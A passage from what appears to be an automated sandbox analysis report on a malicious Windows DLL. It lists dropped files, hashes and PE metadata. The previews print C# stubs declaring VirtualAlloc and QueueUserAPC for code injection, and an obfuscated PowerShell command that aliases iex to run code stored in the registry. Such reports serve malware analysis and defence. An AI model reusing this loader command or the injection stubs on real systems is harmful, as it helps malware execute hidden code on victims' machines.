                                    Encrypted:false
                                    SSDEEP:24:Hve6zW9NKrrOuHFhKdNII+ycuZhNtakSbPNnq92d:PSKrSuTKdu1ulta3Rq9G
                                    MD5:9DE94FD3F34A6169E6324C66FF77C906
                                    SHA1:7F571FE5F120D2E0CD51403DE13472DD1560A4AC
                                    SHA-256:97E062CCF0173420D01EC0CEEE1D77241EACA5BA6F81AA4EDC3C52032863DA23
                                    SHA-512:371F5B070E73B96CA218C25EB972D72EE668190077A90521E71D96E8EB9F1935F9544FB2B91A0B9FED40C9AFAA853B34CEA4640654EA0F33E4A94D10D2C3EA84
                                    Malicious:false
                                    Preview:L....Rcb.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\ci1gjuu1\CSCFDAADE721EC5455F89368A25D31BABAB.TMP....................W...F..i..a.=...........5.......C:\Users\user\AppData\Local\Temp\RES319C.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.i.1.g.j.u.u.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                    C:\Users\user\AppData\Local\Temp\RESFC15.tmp

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                                    Category:dropped
                                    Size (bytes):1332
                                    Entropy (8bit):4.00763306842418
                                    Encrypted:false
                                    SSDEEP:24:HNzW9NhhZ8xuHfQhKdNII+ycuZhNXakSZPNnq92d:Ehh2xuaKdu1ulXa3bq9G
                                    MD5:6D7A47645190CE81FA9272663BB066B9
                                    SHA1:79E7D6F114861BE379EACF2CAB653FC0E5694B21
                                    SHA-256:3D846BF40B7AE12970AFD5E48C749ACF0619045C17194DCCFDE8D8533DB9FED7
                                    SHA-512:A7D776C98716A09C1B3C86F622FBC8ACEEDFD40B3C570525CF1CE57DF8B7BA9B32766AFE8A655A08AE0E88ADF7375F5E2E4E49E5CBF2D5DA5C6E5CA760CB6E80
                                    Malicious:false
                                    Preview:L....Rcb.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........U....c:\Users\user\AppData\Local\Temp\f2vxj03f\CSCE6C104441B84417C9AABF578684269B5.TMP..................K{=.3g..8.... "...........5.......C:\Users\user\AppData\Local\Temp\RESFC15.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.2.v.x.j.0.3.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dejrq2ox.1xj.ps1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Preview:1

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thox1gbj.l0h.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:very short file (no magic)
                                    Category:dropped
                                    Size (bytes):1
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3:U:U
                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                    Malicious:false
                                    Preview:1

                                    C:\Users\user\AppData\Local\Temp\ci1gjuu1\CSCFDAADE721EC5455F89368A25D31BABAB.TMP

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):652
                                    Entropy (8bit):3.1053216887427664
                                    Encrypted:false
                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryvak7YnqqbPN5Dlq5J:+RI+ycuZhNtakSbPNnqX
                                    MD5:80E5570291184688A869DEE161E23D8E
                                    SHA1:6803FA57ED622585EE8629C641C943D5303F7502
                                    SHA-256:E2600F55D8FEF33F62C87CDBC3ED97EB6833A1665918EBCCEADCD40F16B029D7
                                    SHA-512:C1B9957D45F2E7CEC4C533285B3D380AC354B677DE6B8FA2D679718010811F5D36B9D83D8EBB3A65920DC93254184AA83A9BB59A598EBE4D1F54DD67272F16AB
                                    Malicious:false
                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...c.i.1.g.j.u.u.1...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...c.i.1.g.j.u.u.1...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                    C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.0.cs

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text
                                    Category:dropped
                                    Size (bytes):417
                                    Entropy (8bit):5.038440975503667
                                    Encrypted:false
                                    SSDEEP:6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny
                                    MD5:AE91D1351B9FB773FEF9B6F31D0A22EE
                                    SHA1:323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31
                                    SHA-256:2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD
                                    SHA-512:94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23
                                    Malicious:false
                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class omrgvusmwh. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ooyvxktqmjp,uint oshbdrwt);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr payqgxim,uint tthajtdrqfh,uint vcyatdpvykk,uint vnrytmsowy);.. }..}.

                                    C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.cmdline

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                    Category:dropped
                                    Size (bytes):371
                                    Entropy (8bit):5.249019234797919
                                    Encrypted:false
                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fNn0zxs7+AEszI923fXH:p37Lvkmb6KzN0WZE2v
                                    MD5:F28E2C87B12035961456125647878FCE
                                    SHA1:6F55949A828C2B465A50A45C6C71FA3C01A3BDCE
                                    SHA-256:5B68794520547EA8882EBC7A84C4366A01EB2392313037DD1B2F8B0B6DFFFB30
                                    SHA-512:AA2DAC61F09E0EE93261701B2881E645FF000836C6F291E3F75773D24860217860D2A87A8B29062C31BEBEB4347DA4D474271E36AA6EA1AF911D844AADB5FAEA
                                    Malicious:false
                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.0.cs"

                                    C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.dll

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):3584
                                    Entropy (8bit):2.6530037012560004
                                    Encrypted:false
                                    SSDEEP:24:etGSIMWWOJy853Ek0s2E7OgkdWQzbtkZf1mOWI+ycuZhNtakSbPNnq:6Kvz5UkGE7v2WQzqJ1m11ulta3Rq
                                    MD5:E00BC379F4F3CAAAE28A855CBA000F3A
                                    SHA1:2F2AFF2B7C7AD9D1EDE37E66F7CA2F071F3DC7C1
                                    SHA-256:28E97F3EC717884B7058865891248914DA5DD87C0B88E57E321B4EC5A39C3FD0
                                    SHA-512:47394F7F97B84050693B758939C8C57DFAFEE9E11714AEC31E7A43593D92EAD5B1DE46B0581B9F1F34582BDB3C9E26246BBDE94ACABA0203201EAA5DC9E98FD7
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Rcb...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................$......H.......X ..p.............................................................(....*BSJB............v4.0.30319......l...H...#~......P...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............1.......................".............. =............ O............ W.....P ......d.........j.....v...........................d. ...d...!.d.%...d.......*.....3.D.....=.......O.......W...........

                                    C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.out

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):868
                                    Entropy (8bit):5.336626837702438
                                    Encrypted:false
                                    SSDEEP:24:AId3ka6KzNVE2WKaM5DqBVKVrdFAMBJTH:Akka6arE2WKxDcVKdBJj
                                    MD5:DB810852324B71057176ED36F2CA1695
                                    SHA1:713996E9A782D6855EE1478FD42E7805D09C4A93
                                    SHA-256:5B22C0AB30D90381ADF759C4D158F834E885757D62A889E1EC714AE99875F44D
                                    SHA-512:79F2ED62FF95B48C4E1F26A2AF8845FE6BBFC0D7F69563C76E76C79C2DA3960068228164BF20AB849FC65B24298D950CB46FB36C7D83707ED812AE336AC41DBA
                                    Malicious:false
                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ci1gjuu1\ci1gjuu1.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                    C:\Users\user\AppData\Local\Temp\f2vxj03f\CSCE6C104441B84417C9AABF578684269B5.TMP

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:MSVC .res
                                    Category:dropped
                                    Size (bytes):652
                                    Entropy (8bit):3.121923247223275
                                    Encrypted:false
                                    SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0lyak7YnqqXlTPN5Dlq5J:+RI+ycuZhNXakSZPNnqX
                                    MD5:4B7B3DAD3367B7883885AE92CC2022A8
                                    SHA1:4AB6E72835EF2BD6D9846FF139DE59289E97B3D1
                                    SHA-256:969A0F960763778F331C1CFB2FF57CA4696E3A7EDAE689A3F0BD9F40A12D3C1F
                                    SHA-512:1E8AD8BFD152023AF10B6D9A725282C1FD2CFAA6172E575B66471D6D695991B915BBF5DFB571C47E2DE640F1E8D7EB39B502B12A359A7038A8BEF90DCAE3094B
                                    Malicious:false
                                    Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.2.v.x.j.0.3.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...f.2.v.x.j.0.3.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                    C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.0.cs

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text
                                    Category:dropped
                                    Size (bytes):411
                                    Entropy (8bit):5.082169696837192
                                    Encrypted:false
                                    SSDEEP:6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy
                                    MD5:248E15CD19191D4333303E0E1F8E9A70
                                    SHA1:9896EF9708F81AE4E3F2CA86329AD6BD82C700C3
                                    SHA-256:0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF
                                    SHA-512:8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1
                                    Malicious:false
                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yifpgxqqbj. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr fsk,IntPtr kjxclvenfq,IntPtr wvolbwmjwax);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint jbsq,uint eftlv,IntPtr hpbmctchgk);.. }..}.

                                    C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.cmdline

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                    Category:dropped
                                    Size (bytes):371
                                    Entropy (8bit):5.302952125242329
                                    Encrypted:false
                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923filzxs7+AEszI923fiW9n:p37Lvkmb6KzKWZE2B9
                                    MD5:4023D8D689AEED7AD6BA5A8D55E73792
                                    SHA1:624E325D40A40C0E16FDC537DB9A1E37319394F2
                                    SHA-256:128109BC2099C5A84A35768FA9F4A64DBF7920B09E1BE9312703554DC63FCD10
                                    SHA-512:F63FE1FD497662D350C1A921600CE34A6088258938A6809A5EBC2C00275F81351E6922CDCBFF65891B5DD376865C8531E0D15FDFE7E3526530AAFA7385B7223C
                                    Malicious:false
                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.0.cs"

                                    C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.dll

                                    Download File
                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                    Category:dropped
                                    Size (bytes):3584
                                    Entropy (8bit):2.6409513225199364
                                    Encrypted:false
                                    SSDEEP:24:etGSK8+mUE7R853RY0kCG7J+4I4tkZfHqug3DZ0WI+ycuZhNXakSZPNnq:6EXE7S50WJHq3ZX1ulXa3bq
                                    MD5:67D7212A2B15084D3B6FA70F16AFDD6C
                                    SHA1:743A096BCF4E42AB064F5139488194811EF23782
                                    SHA-256:878B7E2B251C062F95F45B18FE7248D95EA378707CFDFFB0A6043B134B463761
                                    SHA-512:992DB5E31B77859DC273C344444A5A93963F16BA9796F261197E2D4F9FBF6AC194DD29A7261D5A53A2BE79226F9E547E1D7EEF0456EC50CAEAF1ACFDE033F848
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Rcb...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..d.............................................................(....*BSJB............v4.0.30319......l...H...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................6./...............%.......................".............. =............ J............ ].....P ......h.........n.....r.....}.....................h. ...h...!.h.%...h.......*.....3.8.....=.......J.......]...........

                                    C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.out

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                                    Category:modified
                                    Size (bytes):868
                                    Entropy (8bit):5.35568353482419
                                    Encrypted:false
                                    SSDEEP:12:xKIR37Lvkmb6KzKWZE2B4KaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:AId3ka6KzrE2WKaM5DqBVKVrdFAMBJTH
                                    MD5:D8D7A68D20996F61BC72BD192FB1D83C
                                    SHA1:92F7412CE0E44D88FEE4D91B1003D435385BF7EE
                                    SHA-256:1D14F98EF405654C358851C49324CDBD3FABAE5F2213B38D652C01CE24AA01B4
                                    SHA-512:A51C5EC8636040C299D6F6A2E8053B47AC6EF5B3830CE875257F27FC98448FC9195A317E723A793B0115E091BA49A3056667FA8E3605D89B97FA3B10599BFA9F
                                    Malicious:false
                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\f2vxj03f\f2vxj03f.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                    C:\Users\user\Documents\20220422\PowerShell_transcript.701188.6Ui9L_aX.20220422181317.txt

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):1357
                                    Entropy (8bit):5.3549203065751
                                    Encrypted:false
                                    SSDEEP:24:BxSABDvBBRJNzx2DOXUWndxSXLCHgo4qWnHjeTKKjX4CIym1ZJXLdxSXLCHgo4Ui:BZJv/TZoO9pb4tnqDYB1Zvpb4iZZ+
                                    MD5:8F2C181896931A924F0038005408C3D7
                                    SHA1:DB9E8BEF4B235EE727DB7754F9B8884403C420CB
                                    SHA-256:FF8A78A7E137AE094866B5F6C45363A3AFDC5E3E7069033961BFCC760ED2B1DF
                                    SHA-512:634578FD917A2633DD4E58F706DC141E71BE8B88E56724D05817BE8AACA4951376C6E1A8054FC2F7864E8A6D9E16A97496DCAD6196A6121A871BC09D6DB193B0
                                    Malicious:false
                                    Preview:.**********************..Windows PowerShell transcript start..Start time: 20220422181322..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 701188 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([System.Text.Encoding]::ASCII.GetString((pfemrdpi HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E).UrlsReturn))..Process ID: 6092..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220422181322..**********************..PS>new-alias -name pfemrdpi -value gp; new-alias -name ndgrwui -value iex; ndgrwui ([S

                                    Static File Info

                                    General

                                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):6.116107290295018
                                    TrID:
                                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                    • Generic Win/DOS Executable (2004/3) 0.20%
                                    • DOS Executable Generic (2002/1) 0.20%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:nhLAwAo49f.dll
                                    File size:641494
                                    MD5:117d2886bf0e722b91c0613f337e97da
                                    SHA1:ca858266bb3a6c30bd798bd52ec9ad5f5992c999
                                    SHA256:5460cbecf56cf0527a162da6e9232c055912ae695990c1894a32b08055f45d37
                                    SHA512:bbbcef3522fbfac490a21803c5fab3968f18b5e9ed41db45f4617de4db016a11aae7a8c18ecf6bd189257e1a8e7cf0743d2bd1ecb5ccecf1af1160b4f69dbe2f
                                    SSDEEP:12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8Zlh:+w1lEKOpuYxiwkkgjAN8Z/
                                    TLSH:ABD4BD1A029B2102EBB6CE78A751636C55170CE09B01E2CFC9190DA395E35FBF4FA5ED
                                    File Content Preview:MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{.......................

                                    File Icon

                                    Icon Hash:74f0e4ecccdce0e4

                                    Static PE Info

                                    General

                                    Entrypoint:0x401023
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                    Time Stamp:0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:fd1c62e6f93e304a27347077f6d2b44c

                                    Authenticode Signature

                                    Signature Valid:
                                    Signature Issuer:
                                    Signature Validation Error:
                                    Error Number:
                                    Not Before, Not After
                                      Subject Chain
                                        Version:
                                        Thumbprint MD5:
                                        Thumbprint SHA-1:
                                        Thumbprint SHA-256:
                                        Serial:

                                        Entrypoint Preview

                                        Instruction
                                        jmp 00007F5880CB05CDh
                                        jmp 00007F5880CE0D38h
                                        jmp 00007F5880CB02B3h
                                        jmp 00007F5880CAFF6Eh
                                        jmp 00007F5880CB0389h
                                        jmp 00007F5880CAFDC4h
                                        jmp 00007F5880CE61AFh
                                        jmp 00007F5880CAFECAh
                                        jmp 00007F5880CD9525h
                                        jmp 00007F5880CE93E0h
                                        jmp 00007F5880CE504Bh
                                        jmp 00007F5880CEA5A6h
                                        jmp 00007F5880CAFE41h
                                        jmp 00007F5880CDA65Ch
                                        jmp 00007F5880CECC77h
                                        jmp 00007F5880CE3F22h
                                        jmp 00007F5880CDB6DDh
                                        jmp 00007F5880CB02F8h
                                        jmp 00007F5880CEFC13h
                                        jmp 00007F5880CB001Eh
                                        jmp 00007F5880CEB7D9h
                                        jmp 00007F5880CE1E04h
                                        jmp 00007F5880CDC6EFh
                                        jmp 00007F5880CEB5FAh
                                        jmp 00007F5880CB0295h
                                        jmp 00007F5880CE71D0h
                                        jmp 00007F5880CDEC2Bh
                                        jmp 00007F5880CEED36h
                                        jmp 00007F5880CDDAF1h
                                        jmp 00007F5880CB028Ch
                                        jmp 00007F5880CAFE07h
                                        jmp 00007F5880CE8312h
                                        jmp 00007F5880CEDC8Dh
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3

                                        Rich Headers

                                        Programming Language:
                                        • [ C ] VS2013 build 21005
                                        • [RES] VS2015 build 23026
                                        • [LNK] VS2013 UPD4 build 31101
                                        • [C++] VS2010 SP1 build 40219
                                        • [IMP] VS2012 UPD2 build 60315
                                        • [RES] VS2008 build 21022
                                        • [EXP] VS2015 UPD3.1 build 24215
                                        • [ C ] VS2012 UPD1 build 51106
                                        • [C++] VS2015 UPD3.1 build 24215

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x970000xc8.idata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x980000x703.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x10000x1.text
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x990000x46b8.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x410010x38.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x9731c0x254.idata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x3f1700x40000False0.371898651123data4.44682748237IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rdata0x410000x4001b0x41000False0.805322265625data7.15716511851IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
